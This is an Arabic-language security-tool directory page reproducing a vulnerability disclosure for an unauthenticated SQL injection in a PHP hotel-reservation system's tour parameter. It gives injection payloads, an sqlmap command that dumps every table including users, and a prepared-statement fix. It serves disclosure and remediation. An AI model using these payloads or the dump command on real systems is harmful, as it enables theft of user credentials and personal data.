Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-10290-SQLI — إثبات مفهوم لحقن SQL غير مصادق عليه في نظام حجز الفنادق والسياحة 1.0، مما يوضح استخراج قاعدة البيانات عبر معلمة tour. | Kitploit
أدوات/GitHubGitHub/xmyronn/cve-2026-10290-sqli
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأمن قواعد البيانات
GitHubxmyronn/cve-2026-10290-sqli

CVE-2026-10290-SQLI

إثبات مفهوم لحقن SQL غير مصادق عليه في نظام حجز الفنادق والسياحة 1.0، مما يوضح استخراج قاعدة البيانات عبر معلمة tour.

عرض المستودع
2منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

نظام حجز الفنادق والسياحة - ثغرة حقن SQL غير مصادق عليها في tour.php

تفاصيل الثغرة

الحقلالتفاصيل
العنواننظام حجز الفنادق والسياحة - حقن SQL عبر معامل GET tour
البائعcode-projects.org
رابط البائعhttps://code-projects.org/hotel-and-tourism-reservation-in-php-with-source-code/
المنتجنظام حجز الفنادق والسياحة
الإصدار1.0
نوع الثغرةحقن SQL
CWECWE-89
درجة CVSS9.8 (حرجة)
متجه CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
الملف المتأثر/ht/tour.php
المعامل المتأثرtour (GET)
المصادقة المطلوبةلا
قابل للاستغلال عن بُعدنعم
الباحثSyed Imad Uddin Alvi

الوصف

توجد ثغرة حرجة لحقن SQL في معامل GET tour في ملف tour.php في نظام حجز الفنادق والسياحة الإصدار 1.0. يتم تمرير المعامل مباشرة إلى استعلام SQL خام دون أي تنقية أو استخدام لجمل محضّرة أو التحقق من المدخلات. يمكن لمهاجم عن بُعد غير مصادق التلاعب بالاستعلام لاستخراج أو تعديل أو حذف أي بيانات في قاعدة البيانات. تم تأكيد الثغرة من خلال تفريغ كامل لقاعدة البيانات باستخدام sqlmap.

الكود المعرض للخطر في tour.php:

root@kitploit:~
if(isset($_GET['tour'])) {
    $tourID = $_GET['tour'];
    $select = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");
    $s = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");
    $data = mysqli_fetch_assoc($s);

$tourID مأخوذة مباشرة من $_GET['tour'] ويتم إدراجها في استعلام SQL دون أي تنقية على الإطلاق.


خطوات إعادة الإنتاج

الإعداد: قم بتثبيت نظام حجز الفنادق والسياحة الإصدار 1.0 على XAMPP وادخل عبر http://<target>/ht/

الخطوة 1 — زيارة أي صفحة جولة كمستخدم غير مصادق:

root@kitploit:~
http://<target>/ht/tour.php?tour=4
لقطة شاشة 2026-05-12 001635

الخطوة 2 — حقن علامة اقتباس مفردة لكسر استعلام SQL وتأكيد الثغرة:

root@kitploit:~
http://<target>/ht/tour.php?tour='

النتيجة: يتم طرح خطأ MySQL مميت — مما يؤكد أن المدخلات غير المنقاة تصل إلى استعلام SQL.

لقطة شاشة 2026-05-12 001643

الخطوة 3 — تأكيد حقن SQL باستخدام حمولة منطقية:

root@kitploit:~
http://<target>/ht/tour.php?tour=' or 1=1 -- -

النتيجة: يتم تحميل الصفحة بشكل طبيعي مع بيانات الجولة — تم نجاح الحقن المنطقي.

لقطة شاشة 2026-05-12 001654

الخطوة 4 — تفريغ قاعدة البيانات بأكملها باستخدام sqlmap:

root@kitploit:~
sqlmap -r sqli.txt --dump --batch

النتيجة: يقوم sqlmap بتفريغ جميع الجداول في hotel_db بنجاح بما في ذلك users, rooms, tour_reserves, gallery — تم تأكيد اختراق قاعدة البيانات بالكامل.

لقطة شاشة 2026-05-12 001722

التأثير

يمكن لمهاجم عن بُعد غير مصادق:

  • استخراج جميع البيانات من قاعدة البيانات بما في ذلك بيانات اعتماد المستخدمين، وعناوين البريد الإلكتروني، وأرقام الهواتف، وتفاصيل الحجوزات
  • تجاوز المصادقة عن طريق استخراج بيانات اعتماد المسؤول
  • تعديل أو حذف أي سجلات في قاعدة البيانات
  • إمكانية تحقيق تنفيذ أكواد عن بعد عبر INTO OUTFILE إذا تم منح صلاحيات الملف

السبب الجذري

يتم إدراج معامل GET tour مباشرة في استعلام SQL خام دون استخدام جمل محضّرة أو استعلامات ذات معاملات أو تنقية المدخلات:

root@kitploit:~
// VULNERABLE
$tourID = $_GET['tour'];
$select = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");

// FIXED — use prepared statements
$stmt = $db->prepare("SELECT * FROM tourism WHERE id = ?");
$stmt->bind_param("i", $_GET['tour']);
$stmt->execute();

المراجع

  • CWE-89: تحييد غير صحيح للعناصر الخاصة المستخدمة في أمر SQL
  • OWASP: حقن SQL
  • نظام حجز الفنادق والسياحة — code-projects.org

اكتشف بواسطة

Syed Imad Uddin Alvi — باحث أمني مستقل

تنزيل الأداة